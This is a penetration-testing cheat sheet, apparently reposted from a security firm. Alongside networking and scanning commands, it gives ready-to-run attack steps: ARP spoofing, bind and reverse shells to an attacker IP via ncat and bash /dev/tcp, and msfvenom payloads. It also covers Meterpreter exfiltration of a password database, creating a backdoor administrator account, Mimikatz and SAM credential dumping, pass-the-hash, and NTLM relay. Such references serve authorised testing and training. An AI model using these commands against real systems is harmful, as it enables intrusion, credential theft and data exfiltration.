Hacking Tools Cheat Sheet

This document provides a summary of basic networking and hacking tools. It outlines tools for information gathering like whois and dig lookups, network scanning with nmap, sniffing traffic with tcpdump, and common port scanning and service identification. It also provides examples of setting up simple networking servers and clients using ncat, and instructions for privilege escalation and post-exploitation tasks using tools like Metasploit, PowerShell, and meterpreter.
Uploaded by
Ameur Hed
Basic Linux Networking Tools

Show IP configuration:
# ip a
Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up
Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0
DNS lookup:
# dig compass-security.com
Reverse DNS lookup:
# dig -x 10.5.23.42

Information Gathering

Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs: search for %.compass-security.com on https://crt.sh, or use an nmap script:
# nmap -sn -Pn compass-security.com --script hostmap-crtsh
Combine various sources for subdomain enumeration:
# amass enum -src -brute -min-for-recursive 2 -d compass-security.com

TCP Tools

Listen on TCP port:
# ncat -l -p 1337
Connect to TCP port:
# ncat 10.5.23.42 1337

TLS Tools

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"
Start TLS server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem
Connect to TLS service:
# ncat --ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337
Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text
Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443
TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443
Online TLS tests:
• ssllabs.com, hardenize.com

HTTP Tools

Start Python webserver on port 2305:
# python3 -m http.server 2305
Perform HTTP request:
# curl http://10.5.23.42:2305/?foo=bar
Useful curl options:
• -k: Accept untrusted certificates
• -d "foo=bar": HTTP POST data
• -H "Foo: Bar": HTTP header
• -I: Perform HEAD request
• -L: Follow redirects
• -o foobar.html: Write output file
• --proxy http://127.0.0.1:8080: Set proxy
Scan for common files/applications/configs:
# nikto -host https://example.net
Enumerate common directory-/filenames:
# gobuster dir -k -u https://example.net -w /usr/share/wordlists/dirb/common.txt

Sniffing

ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1
Or a graphical tool:
# ettercap -G
Show ARP cache:
# ip neigh
Delete ARP cache:
# ip neigh flush all
Sniff traffic:
# tcpdump [options] [filters]
Useful tcpdump options:
• -i interface: Interface, or any for all
• -n: Disable name and port resolution
• -A: Print in ASCII
• -XX: Print in hex and ASCII
• -w file: Write output PCAP file
• -r file: Read PCAP file
Useful tcpdump filters:
• not arp: No ARP packets
• port ftp or port 23: Only port 21 or 23
• host 10.5.23.31: Only from/to host
• net 10.5.23.0/24: Only from/to hosts in network
Advanced sniffing using tshark or Wireshark.
Sniffing over SSH on a remote host:
# ssh 10.5.23.42 tcpdump -w- port not ssh | wireshark -k -i -
Search in network traffic:
# ngrep -i password
Show HTTP GET requests:
# urlsnarf
Show transmitted images:
# driftnet

Network Scanning

ARP scan:
# nmap -n -sn -PR 10.5.23.0/24
Reverse DNS lookup of IP range:
# nmap -sL 10.5.23.0/24
Nmap host discovery (ARP, ICMP, SYN 443/tcp, ACK 80/tcp):
# nmap -sn -n 10.5.23.0/24
TCP scan (SYN scan = half-open scan):
# nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24
List Nmap scripts:
# ls /usr/share/nmap/scripts
Scan for EternalBlue vulnerable hosts:
# nmap -n -Pn -p 445 --script smb-vuln-ms17-010 10.5.23.0/24
Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24
Performance tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24
Useful nmap options:
• -n: Disable name and port resolution
• -PR: ARP host discovery
• -Pn: Disable host discovery
• -sn: Disable port scan (host discovery only)
• -sS/-sT/-sU: SYN/TCP connect/UDP scan
• --top-ports 50: Scan 50 top ports
• -iL file: Host input file
• -oA file: Write output files (3 types)
• -sC: Script scan (default scripts)
• --script <file/category>: Specific scripts
• -sV: Version detection
• -6: IPv6 scan
The target can be specified using CIDR notation (10.5.23.0/24) or range definitions (10.13-37.5.1-23).
Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000 10.0.0.0/8
Public internet scan databases:
• shodan.io, censys.io

Shells

Start bind shell (on victim):
# ncat -l -p 2305 -e "/bin/bash -i"
Connect to bind shell (on attacker):
# ncat 10.5.23.42 2305
Listen for reverse shell (on attacker):
# ncat -l -p 23
Start reverse shell (on victim):
# ncat -e "/bin/bash -i" 10.5.23.5 23
Start reverse shell with bash only (on victim):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1
Upgrade to pseudo terminal:
# python -c 'import pty; pty.spawn("/bin/bash")'

Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
# searchsploit apache
Show exploit file path and copy it into clipboard:
# searchsploit -p 40142
Online vulnerability and exploit databases:
• cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking

Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[...]bd88
Show example hash types for hashcat:
# hashcat --example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt

Metasploit Framework

Start Metasploit:
# msfconsole
Search exploit:
> search eternalblue
Use exploit:
msf > use exploit/windows/smb/ms17_…
Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42
Run exploit:
msf exploit(…) > exploit
Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > sh.war
Reverse shell listener:
> use exploit/multi/handler
> set payload linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit
Upgrade to Meterpreter (or press ^Z (Ctrl-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # upgrade session 1
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it
Upload / download files:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb
Execute a file:
meterpreter > execute -i -f /your/bin
Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23
Background Meterpreter session:
meterpreter > background
Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route
SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run
Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080
Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 1337

Linux Privilege Escalation

Enumerate local information (-t for more tests):
# curl -o /tmp/linenum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report
Other hardening checks can be done using lynis or LinPEAS.
Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.

Windows Privilege Escalation

Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23 /add
C:\> net localgroup Administrators backdoor /add
Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\> mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\> reg save HKLM\SYSTEM system.hiv
C:\> reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv

Pass-the-Hash

Shell via pass-the-hash (Impacket tools):
# ./psexec.py -hashes :011AD41795657A8ED80AB3FF6F078D03 domain/username@10.5.23.42
Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 10.5.23.0/24 --sam
Browse shares via pass-the-hash:
# ./smbclient.py domain/usrname@10.5.23.42 -hashes :011AD41795657A8ED80AB3FF6F078D03
RDP via pass-the-hash:
# xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:10.5.23.42
Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

NTLM Relay

Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24
Disable SMB and HTTP in Responder.conf and start Responder:
# ./Responder.py -I eth0
NTLM relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t smb://10.5.23.42
NTLM relay using SOCKS proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks
Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080
Access files via SOCKS proxy:
# proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Administrator%invalidPwd

Active Directory

Use SharpHound to gather information and import it into BloodHound to analyze.
Download PingCastle from pingcastle.com and generate a report.

More Online References

• GitHub "swisskyrepo/PayloadsAllTheThings"
• GitHub "danielmiessler/SecLists"
• GitHub "enaqx/awesome-pentest"

Find more StationX cheat sheets here: https://www.stationx.net/category/cheat-sheets/